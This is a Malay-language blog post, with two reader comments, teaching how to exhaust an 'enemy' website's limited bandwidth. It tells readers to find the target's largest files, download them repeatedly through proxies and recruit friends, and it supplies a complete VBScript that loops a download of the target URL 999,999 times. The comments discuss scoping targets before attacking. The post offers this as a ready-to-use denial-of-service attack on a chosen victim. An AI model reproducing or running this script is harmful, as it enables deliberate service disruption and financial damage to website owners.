Tuesday, March 25, 2008

DDoS vbscript code..

Cara menghabiskan bandwidth musuh kita di alam siber
pertama.. kaji.. kita kena pastikan yang si musuh kita ni ada website
dan mempunyai limited bandwidth
cth.. bandwidth setiap bulan adalah 10gb
kita habiskan 10gb dalam masa 1 hari..
mustahil ke?

owh.. bergantunglah pada server dia..
dan kawan-kawan anda
mana tahu musuh korang itu kaya raya.. stok unlimited bandwidth
adakah kamu mahu lihat paparan
'Bandwidth exceed limit?' ya...
tuan puan..

ok.. cuba kita senaraikan fail yang si musuh kita ada
cth.. http://aaaaa.com/setup.exe < fail ini besarnya 12Mb
senaraikan dahulu...
index.html < katakan yang ini 180kb
cari fail yang besar.. movie ni stok 700MB ..
but download loop sebanyak 15 kali sudah

kalo nak keji.. cari website crawler.. dan ambil semua fail yang ada di server musuh anda..

okeh..
anda paham ke?
mungkin ilmu ini sesuai untuk yang ahlinya sahaja
dengan menggunakan proxy-swicther
atau proxy manual..

code inih... save sebagai habiskanbandwidth.vbs
er.. pastikan saiz hardisk anda pun besar jugala ye..
===========================&< Cut here========================
for a = 1 to 999999
HTTPDownload "http://musuhanda.com/failmusuhanda", "C:\"
next

Sub HTTPDownload( myURL, myPath )
Dim i, objFile, objFSO, objHTTP, strFile, strMsg
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Set objFSO = CreateObject( "Scripting.FileSystemObject" )
If objFSO.FolderExists( myPath ) Then
strFile = objFSO.BuildPath( myPath, Mid( myURL, InStrRev( myURL, "/" ) + 1 ) )
ElseIf objFSO.FolderExists( Left( myPath, InStrRev( myPath, "\" ) - 1 ) ) Then
strFile = myPath
Else
WScript.Echo "ERROR: Target folder not found."
Exit Sub
End If
Set objFile = objFSO.OpenTextFile( strFile, ForWriting, True )
Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" )
objHTTP.Open "GET", myURL, False
objHTTP.Send
For i = 1 To LenB( objHTTP.ResponseBody )
objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) )
Next
objFile.Close( )
End Sub
======================End Cut==================================

kode ini tak sesuai untuk server yang unlimited bandwidth

2 Comment and put their link:

CypherHackz said...

Kalau unlimited bandwidth nak guna script tu pun tak guna brader. Hu3. Sebab memang takkan habis bandwidth die even kita suruh kawan2 kita gune script yang sama attack website tersebut.

فيصل said...

itu la pasal.. mana mungkin dapat downkan website yang ada unlimited bandwitdh.. kode tu untuk yang ada limited bandwidth sahaja.. sebelum menyerang.. kena kaji website tu ada limit atau tidak.. kalau tak.. tak payah serang hehehe

Recent Post

© 2011 ~Menempuh Arus Masa-Life-Photography~, AllRightsReserved.

Designed by ScreenWritersArena